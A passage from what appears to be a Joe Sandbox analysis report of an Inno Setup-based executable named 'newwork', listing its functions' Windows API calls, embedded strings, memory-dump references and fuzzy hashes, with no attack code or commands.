                                                                                • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                • API String ID: 770386003-3271284199
                                                                                • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                APIs
                                                                                  • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                  • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                  • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                  • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC), ref: 004783CC
                                                                                  • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                  • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021A2BDC,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                • API String ID: 883996979-221126205
                                                                                • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1631623395-0
                                                                                • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00418393
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                • GetWindowRect.USER32(?), ref: 004183CC
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 107509674-3733053543
                                                                                • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
APIs
• GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
• GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
• GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
• ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressProc$CryptVersion
• String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
• API String ID: 1951258720-508647305
• Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
• Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
• Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
• Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
• SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
• FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
• FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
• Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
• Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
• Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
• Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
• SetForegroundWindow.USER32(?), ref: 00457649
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
• Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
• Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
• Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
• Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
• Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
• Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
• Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
• Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
• Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
APIs
• SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
• FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
• FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
• FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
• Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
• FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
• Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ErrorLast$CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 1177325624-0
• Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
• Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
• Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
• Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 0048397A
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$IconicLong
                                                                                • String ID:
                                                                                • API String ID: 2754861897-0
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 004241E4
                                                                                • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                  • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021A25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveFocusIconicShow
                                                                                • String ID:
                                                                                • API String ID: 649377781-0
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00417D0F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
